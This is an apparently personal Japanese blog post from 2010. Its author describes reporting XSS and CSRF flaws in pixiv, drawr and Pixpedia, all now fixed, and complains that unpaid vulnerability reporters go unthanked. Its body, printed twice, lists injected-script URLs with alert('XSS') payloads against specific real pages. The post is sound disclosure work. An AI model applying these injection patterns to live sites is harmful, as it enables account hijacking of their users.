kinugawamasato0 blog
皆で願えば世界はきっと平和になるよね!
Entries
pixivのXSS/CSRF脆弱性を報告したよ
こんにちはっ
自分の書いたイラストを投稿するサイト、pixivでこんな事件があったみたいです!
「ヘタクソ」pixivに意図せず中傷コメント CSRF脆弱性を悪用
http://www.itmedia.co.jp/news/articles/1002/15/news086.html
CSRFは不正アクセスとはまた違うと素人の僕は思うんですけど、
まぁその話は法律とかに詳しい人にしてもらうとして、
なにはともあれ、中傷はいけませんよね。
pixivはこの件があってから、
脆弱性につながる情報には緊急問合せフォームを設けたりと、
セキュリティ対策に気合いが入ってきたみたいです!
よっしゃ!
というわけで、せっかくなので僕も協力しました!!
※今は全部修正されてます!
【XSS】(→最悪アカウントのっとられちゃったりするやつだよ!)
1.イラストのタイトル部分(img要素のalt属性)
2.pixivイラスト検索1(ログイン時動作してた)
http://www.pixiv.net/search.php?s_mode=s_tag&word=pixiv&p=1%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
3.pixivイラスト検索2(ログイン時動作してた)
http://www.pixiv.net/search.php?s_mode=s_tag&word=pixiv&order=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
4.イラストの埋め込み用URL
http://embed.pixiv.net/code.php?id=〜絵それぞれのid〜%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
5.pixivブックマーク(ログイン時動作してた)
http://www.pixiv.net/bookmark.php?p=1%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
6.pixivブックマーク(ログイン時、タグを削除するボタンを押すと動作してた)
http://www.pixiv.net/bookmark.php?tag=%27%2Balert%28%27XSS%27%29%29%3B%28%27
7.drawrブックマーク(ログイン時動作してた)
http://drawr.net/bookmark.php?id=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
8.ピクペディア検索
http://pedia.pixiv.net/search?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
【CSRF】(→ニュースのやつ。勝手になんかされちゃうやつだよ!)
9.pixivプロフィール画像の削除/変更
今は
http://www.pixiv.net/profile_img.php?mode=chg&number=**&tt=09juq5h09af
赤字の部分みたいな予想できない文字が入った!
10.drawrの投稿画像の削除/ブックマーク登録or解除/お気に入りユーザー登録or解除
僕の勘違いかも。もしかしたら最初から対策されていたかも?
とりあえず今はリファラーで規制してる?
あと以下は昔報告したXSSだけど
11.pixivログイン部分(pixiv ID、パスワードそれぞれのフォーム)(postのみなので、あったということだけ)
12.イラストの管理ページ(公開範囲)
http://www.pixiv.net/member_illust.php?order=date%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
13.イラストの管理ページ(ソート)
http://www.pixiv.net/member_illust.php?res=full%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
14.ピクペディアログイン部分のリダイレクト
http://pedia.pixiv.net/login/login?redirect_to=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
そんなかんじでいっぱいありましたとさ!
こんだけ頑張って探したけど、
脆弱性報告ってさ、見返りが無いに等しいんだよね!
セキュリティ監査会社や攻撃者にとって脆弱性は利益をうみだすものだけど、
一般のユーザーって、発見して報告しても、
「報告ありがとうございました。調査させていただきます。」
とかって形式ばったメール貰うだけなんだよね・・・!
FirefoxやGoogle Chromeは脆弱性を発見し、評価されると、お金がもらえるそうです!
そういうの、やってくれないかなあ!
お金まで出してくれなくても、
〜〜に〜〜脆弱性がありました。現在は修正しました。
kingawamasatoさま、ご報告ありがとうございました。
って公式ブログで紹介してもらうとかしてくれるだけでも、
うふ♪ってなるのに!大人子供関係なく、人間そういうものだと思うけどなー。
だってほら、幸せを祈るとき、名前を表示させるだけで、※結構な人が喜んでくれてるし・・・!
※消されちゃったけど、60件以上の拍手と、120件以上のコメントを頂いたよ!
そういうことすれば皆報告する気になるし、ユーザーがたくさん報告してこれば、
運営する側も直す気になるんじゃないかなあ?
あと、セキュリティの向上って、ユーザーにとって利益なのに、
向上したことは目に見えないから、ユーザーに感謝されることもないんだよね。うーん、つまらない・・・!
そんなわけで、むなしいので、ここで、
脆弱性を報告したよって自分で言うことにしたんだよ!
pixivユーザーのみなさま、僕は頑張りました!!!何か言う事があったらどうぞ!!!><
そして、pixivの中の人は、昨日深夜にもかかわらず、
これらの脆弱性全てを数時間以内に修正していましたよ!お疲れ様です!
pixivの中の人が昨日深夜頑張ったこともpixivユーザーの皆は知らないはずなので、
僕が言っておきますね!感謝してあげて下さい!
一方、fc2は・・・・・・!!
fc2に脆弱性報告をした時の返信メール↓
そうですか・・・!予めご了承しました・・・!!
・・・ってヘイ!!報告したの1ヶ月前だぜヘイ!!!どんだけ殺到してんだYO!><
なおってなければ返信もないYO!!
がんばれfc2!!!!協力するから!!
皆が安全にfc2のサービスを使えたらいいな。さようならっ!
自分の書いたイラストを投稿するサイト、pixivでこんな事件があったみたいです!
「ヘタクソ」pixivに意図せず中傷コメント CSRF脆弱性を悪用
http://www.itmedia.co.jp/news/articles/1002/15/news086.html
CSRFは不正アクセスとはまた違うと素人の僕は思うんですけど、
まぁその話は法律とかに詳しい人にしてもらうとして、
なにはともあれ、中傷はいけませんよね。
pixivはこの件があってから、
脆弱性につながる情報には緊急問合せフォームを設けたりと、
セキュリティ対策に気合いが入ってきたみたいです!
よっしゃ!
というわけで、せっかくなので僕も協力しました!!
※今は全部修正されてます!
【XSS】(→最悪アカウントのっとられちゃったりするやつだよ!)
1.イラストのタイトル部分(img要素のalt属性)
2.pixivイラスト検索1(ログイン時動作してた)
http://www.pixiv.net/search.php?s_mode=s_tag&word=pixiv&p=1%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
3.pixivイラスト検索2(ログイン時動作してた)
http://www.pixiv.net/search.php?s_mode=s_tag&word=pixiv&order=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
4.イラストの埋め込み用URL
http://embed.pixiv.net/code.php?id=〜絵それぞれのid〜%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
5.pixivブックマーク(ログイン時動作してた)
http://www.pixiv.net/bookmark.php?p=1%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
6.pixivブックマーク(ログイン時、タグを削除するボタンを押すと動作してた)
http://www.pixiv.net/bookmark.php?tag=%27%2Balert%28%27XSS%27%29%29%3B%28%27
7.drawrブックマーク(ログイン時動作してた)
http://drawr.net/bookmark.php?id=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
8.ピクペディア検索
http://pedia.pixiv.net/search?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
【CSRF】(→ニュースのやつ。勝手になんかされちゃうやつだよ!)
9.pixivプロフィール画像の削除/変更
今は
http://www.pixiv.net/profile_img.php?mode=chg&number=**&tt=09juq5h09af
赤字の部分みたいな予想できない文字が入った!
10.drawrの投稿画像の削除/ブックマーク登録or解除/お気に入りユーザー登録or解除
僕の勘違いかも。もしかしたら最初から対策されていたかも?
とりあえず今はリファラーで規制してる?
あと以下は昔報告したXSSだけど
11.pixivログイン部分(pixiv ID、パスワードそれぞれのフォーム)(postのみなので、あったということだけ)
12.イラストの管理ページ(公開範囲)
http://www.pixiv.net/member_illust.php?order=date%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
13.イラストの管理ページ(ソート)
http://www.pixiv.net/member_illust.php?res=full%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
14.ピクペディアログイン部分のリダイレクト
http://pedia.pixiv.net/login/login?redirect_to=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
そんなかんじでいっぱいありましたとさ!
こんだけ頑張って探したけど、
脆弱性報告ってさ、見返りが無いに等しいんだよね!
セキュリティ監査会社や攻撃者にとって脆弱性は利益をうみだすものだけど、
一般のユーザーって、発見して報告しても、
「報告ありがとうございました。調査させていただきます。」
とかって形式ばったメール貰うだけなんだよね・・・!
FirefoxやGoogle Chromeは脆弱性を発見し、評価されると、お金がもらえるそうです!
そういうの、やってくれないかなあ!
お金まで出してくれなくても、
〜〜に〜〜脆弱性がありました。現在は修正しました。
kingawamasatoさま、ご報告ありがとうございました。
って公式ブログで紹介してもらうとかしてくれるだけでも、
うふ♪ってなるのに!大人子供関係なく、人間そういうものだと思うけどなー。
だってほら、幸せを祈るとき、名前を表示させるだけで、※結構な人が喜んでくれてるし・・・!
※消されちゃったけど、60件以上の拍手と、120件以上のコメントを頂いたよ!
そういうことすれば皆報告する気になるし、ユーザーがたくさん報告してこれば、
運営する側も直す気になるんじゃないかなあ?
あと、セキュリティの向上って、ユーザーにとって利益なのに、
向上したことは目に見えないから、ユーザーに感謝されることもないんだよね。うーん、つまらない・・・!
そんなわけで、むなしいので、ここで、
脆弱性を報告したよって自分で言うことにしたんだよ!
pixivユーザーのみなさま、僕は頑張りました!!!何か言う事があったらどうぞ!!!><
そして、pixivの中の人は、昨日深夜にもかかわらず、
これらの脆弱性全てを数時間以内に修正していましたよ!お疲れ様です!
pixivの中の人が昨日深夜頑張ったこともpixivユーザーの皆は知らないはずなので、
僕が言っておきますね!感謝してあげて下さい!
一方、fc2は・・・・・・!!
fc2に脆弱性報告をした時の返信メール↓
のちほど正式なご返答メールをお送りいたします。
迅速な対応を心がけておりますが、お問い合わせが殺到した場合、
回答までお時間がかかる場合がございます。予めご了承下さい。
迅速な対応を心がけておりますが、お問い合わせが殺到した場合、
回答までお時間がかかる場合がございます。予めご了承下さい。
そうですか・・・!予めご了承しました・・・!!
・・・ってヘイ!!報告したの1ヶ月前だぜヘイ!!!どんだけ殺到してんだYO!><
なおってなければ返信もないYO!!
がんばれfc2!!!!協力するから!!
皆が安全にfc2のサービスを使えたらいいな。さようならっ!
- @
- 2010-02-17
- 未分類
- コメント : 0
- トラックバック : 0
- この記事にトラックバックする(FC2ブログユーザー)
- http://kinugawamasato0.blog31.fc2.com/tb.php/6-dc900ddd
トラックバック
コメント
Appendix
プロフィール
Author:kinugawamasato
世界が平和になりますように!
最新記事
- pixivのXSS/CSRF脆弱性を報告したよ (02/17)
- かんたんに幸せを願えるXSS! (02/12)
- fc2ブログのまずい訪問者の判別方法 (02/08)
- 名前をカラフルにするブックマークレット (02/07)
- fc2ブログidを表示するスクリプト (02/05)
最新コメント
- ねこにゃん:fc2ブログのまずい訪問者の判別方法 (02/12)
- ねこにゃん:fc2ブログのまずい訪問者の判別方法 (02/11)
- ねこにやん:fc2ブログのまずい訪問者の判別方法 (02/10)
- kinugawamasato0:fc2ブログのまずい訪問者の判別方法 (02/09)
- ねこにゃん:fc2ブログのまずい訪問者の判別方法 (02/09)
- kinugawamasato0:名前をカラフルにするブックマークレット (02/08)
- (^_^)ねこにゃん。 やすみ:名前をカラフルにするブックマークレット (02/07)
最新トラックバック
検索フォーム
Powered By FC2ブログ
コメントの投稿